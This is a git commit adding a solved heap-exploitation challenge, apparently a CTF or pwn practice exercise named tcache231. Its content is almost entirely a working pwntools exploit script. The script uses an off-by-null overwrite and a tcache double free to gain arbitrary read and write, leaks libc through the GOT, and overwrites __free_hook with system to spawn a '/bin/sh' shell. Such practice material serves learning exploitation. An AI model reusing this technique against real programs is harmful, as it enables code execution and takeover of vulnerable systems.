Finished TCache/tcache231
This commit is contained in:
66
TCache/tcache231/answer.py
Executable file
66
TCache/tcache231/answer.py
Executable file
@@ -0,0 +1,66 @@
|
|||||||
|
#!/usr/bin/env python2
|
||||||
|
# coding = utf-8
|
||||||
|
|
||||||
|
from pwn import *
|
||||||
|
from LibcSearcher import *
|
||||||
|
context(arch = "amd64", os = "linux", log_level = "debug")
|
||||||
|
|
||||||
|
def send_choice(choice):
|
||||||
|
p.recvuntil('>')
|
||||||
|
p.sendline(str(choice))
|
||||||
|
|
||||||
|
def create(size, data):
|
||||||
|
send_choice(1)
|
||||||
|
p.recvuntil('size ?')
|
||||||
|
p.sendline(str(size))
|
||||||
|
p.recvuntil('data:')
|
||||||
|
p.send(data)
|
||||||
|
|
||||||
|
def delete(index):
|
||||||
|
send_choice(2)
|
||||||
|
p.recvuntil('index?')
|
||||||
|
p.sendline(str(index))
|
||||||
|
|
||||||
|
def show(index):
|
||||||
|
send_choice(3)
|
||||||
|
p.recvuntil('index?')
|
||||||
|
p.sendline(str(index))
|
||||||
|
|
||||||
|
|
||||||
|
p = process('./tcache231')
|
||||||
|
elf = ELF('./tcache231')
|
||||||
|
gdb.attach(p, '')
|
||||||
|
|
||||||
|
def arbitrary_write(desired_addr, data, shift):
|
||||||
|
create(0x28, 'a') # Chunk #0 to do OffByNull
|
||||||
|
create(0x108, 'a') # Chunk #1 whose size was written
|
||||||
|
create(0x108, 'a') # Chunk #2 (1) to seperate from top chunk and (2) to add tcachebin counts for chunk size 0x110
|
||||||
|
delete(2 + shift)
|
||||||
|
delete(1 + shift)
|
||||||
|
delete(0 + shift)
|
||||||
|
create(0x28, '/bin/sh\x00'.ljust(0x28, '\x00')) # Do OffByNull to change Chunk #1's size from 0x110 to 0x100
|
||||||
|
delete(1 + shift) # Double free Chunk #1, now Chunk #1 in both tcachebin 0x100 & 0x110
|
||||||
|
create(0xf8, p64(desired_addr)) # Extend the tcachebin chain for size 0x110
|
||||||
|
create(0x108, 'a')
|
||||||
|
create(0x108, data)
|
||||||
|
|
||||||
|
def arbitrary_read(desired_addr, shift):
|
||||||
|
note_num_addr = 0x4040AC
|
||||||
|
arbitrary_write(note_num_addr, p32(0) + b'\x00' * 0x30 + p64(desired_addr) + p64(0) * 5, shift)
|
||||||
|
show(0)
|
||||||
|
|
||||||
|
free_got = 0x404018
|
||||||
|
arbitrary_read(free_got, 0)
|
||||||
|
free_libc = u64(p.recv(6) + b'\x00\x00')
|
||||||
|
libc = LibcSearcher('free', free_libc)
|
||||||
|
libc_base = free_libc - libc.dump('free')
|
||||||
|
libc_system = libc_base + libc.dump('system')
|
||||||
|
free_hook_libc = libc_base + libc.dump('__free_hook')
|
||||||
|
log.info(f"free_libc: {hex(free_libc)}")
|
||||||
|
log.info('libc base: ' + hex(libc_base))
|
||||||
|
log.info('system: ' + hex(libc_system))
|
||||||
|
log.info('__free_hook: ' + hex(free_hook_libc))
|
||||||
|
arbitrary_write(free_hook_libc, p64(libc_system), 1)
|
||||||
|
delete(4)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
BIN
TCache/tcache231/tcache231
Executable file
BIN
TCache/tcache231/tcache231
Executable file
Binary file not shown.
BIN
TCache/tcache231/tcache231.i64
Normal file
BIN
TCache/tcache231/tcache231.i64
Normal file
Binary file not shown.
Reference in New Issue
Block a user